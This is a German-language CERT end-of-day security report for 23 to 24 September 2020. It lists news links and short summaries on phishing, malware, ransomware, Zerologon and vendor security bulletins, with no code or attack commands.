End-of-Day report
Timeframe: Mittwoch 23-09-2020 18:00 - Donnerstag 24-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
News
Security-Checkliste Passwörter & Accounts
Passwörter sind ein notwendiges Übel. Mit den folgenden Tipps haben Sie so wenig Passwortstress wie nötig, ohne an der Sicherheit zu sparen.
https://heise.de/-4886755
Vorsicht vor Raiffeisen Phishing SMS
Momentan werden massenhaft betrügerische Phishing SMS im Namen der Raiffeisen Bank verschickt. Angeblich sollte eine PushTAN Registrierung abgeschlossen werden. Die verlinkte Website sieht der echten dabei zum Verwechseln ähnlich. Achtung: Hier dürfen keinesfalls die eigenen Online Banking Daten eingegeben werden. Diese landen direkt in den Händen Krimineller.
https://www.watchlist-internet.at/news/vorsicht-vor-raiffeisen-phishing-sms/
Android-Malware Alien stiehlt Geld
Ein Android-Trojaner namens Alien ist seit Anfang des Jahres aktiv und wird als Malware-as-a-Service (MaaS) in unterirdischen Hackerforen angeboten. Ziel sind Banking- und Finanz-Apps auch in Deutschland
https://www.zdnet.de/88382932/android-malware-alien-stiehlt-geld/
Supply Chain bietet Angriffspunkte
Hacker nutzen zunehmend die Lieferketten im Ökosystem von Unternehmen, um ihre Angriffe vorzutragen. Kleinere Lieferanten mit schwachen Sicherheitsstrukturen bieten Einstiegspunkte für Attacken.
https://www.zdnet.de/88382938/supply-chain-bietet-angriffspunkte/
Protecting Against PowerShell Attacks: 5 Key Steps
Admins are already busy maintaining all systems running onsite and remotely, so the extra demand to protect against fileless threats can be overwhelming for manual security operations and inexperienced IT professionals. There are, however, five basic steps you can take to help mitigate the threat
https://www.beyondtrust.com/blog/entry/protecting-against-powershell-attacks-is-easier-than-you-think
AgeLocker ransomware targets QNAP NAS devices, steals data
QNAP NAS devices are being targeted in attacks by the AgeLocker ransomware, which encrypts the devices data, and in some cases, steal files from the victim.
https://www.bleepingcomputer.com/news/security/agelocker-ransomware-targets-qnap-nas-devices-steals-data/
Malicious One-Liner Using Hastebin
Short scripts that deliver malware to a website are nothing new, but during a recent investigation we found a script using hastebin[.]com, which is a domain we see used infrequently. The script was found writing malicious contents into an image directory on a compromised website, allowing an attacker to execute other malicious commands.
https://blog.sucuri.net/2020/09/malicious-one-liner-using-hastebin.html
[SANS ISC] Party in Ibiza with PowerShell
I published the following diary on isc.sans.edu: "Party in Ibiza with PowerShell": Today, I would like to talk about PowerShell ISE or "Integration Scripting Environment". This tool is installed by default on all Windows computers (besides the classic PowerShell interpreter). From a malware analysis point of view, ISE offers a key feature: [...]
https://blog.rootshell.be/2020/09/24/sans-isc-party-in-ibiza-with-powershell/
Fuzzing Image Parsing in Windows, Part One: Color Profiles
Image parsing and rendering are basic features of any modern operating system (OS). Image parsing is an easily accessible attack surface, and a vulnerability that may lead to remote code execution or information disclosure in such a feature is valuable to attackers.
https://www.fireeye.com/blog/threat-research/2020/09/fuzzing-image-parsing-in-windows-color-profiles.html
Vulnerabilities
Jetzt patchen! Attacken auf Zerologon-Lücke in Windows Server
Microsoft warnt vor Attacken auf eine kritische Sicherheitslücke in verschiedenen Windows-Server-Versionen. Auch Samba ist betroffen.
https://heise.de/-4910854
Security updates for Thursday
Security updates have been issued by Fedora (firefox, libproxy, mbedtls, samba, and zeromq), openSUSE (chromium and virtualbox), Red Hat (firefox and kernel), SUSE (cifs-utils, conmon, fuse-overlayfs, libcontainers-common, podman, libcdio, python-pip, samba, and wavpack), and Ubuntu (rdflib).
https://lwn.net/Articles/832405/
Synology-SA-20:22 SRM
A vulnerability allows remote authenticated users to bypass security constraints via a susceptible version of Synology Router Manager (SRM).
https://www.synology.com/en-global/support/security/Synology_SA_20_22
Wireshark: Mehrere Schwachstellen ermöglichen Denial of Service
http://www.cert-bund.de/advisoryshort/CB-K20-0922
Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-apache-struts-affect-tivoli-netcool-omnibus-webgui-cve-2019-0233-cve-2019-0230/
Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerability-from-kernel-affects-ibm-netezza-host-management-10/
Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Spectrum Conductor and IBM Spectrum Conductor with Spark
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-runtime-affect-ibm-spectrum-conductor-and-ibm-spectrum-conductor-with-spark-3/
Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Manager previously known as IBM Security Privilege Manager
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-ibm-security-verify-privilege-manager-previously-known-as-ibm-security-privilege-manager/
Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerabilities-from-kernel-affect-ibm-netezza-host-management-7/
Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerability-from-kernel-affects-ibm-netezza-host-management-9/
Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerabilities-from-kernel-affect-ibm-netezza-host-management-6/
Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Vault previously known as IBM Security Secret Server
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-ibm-security-verify-privilege-vault-previously-known-as-ibm-security-secret-server/
Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerability-from-kernel-affects-ibm-netezza-host-management-8/
Security Bulletin: Multiple vulnerabilities affect IBM Tivoli Monitoring embedded WebSphere Application and IHS server
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affect-ibm-tivoli-monitoring-embedded-websphere-application-and-ihs-server-2/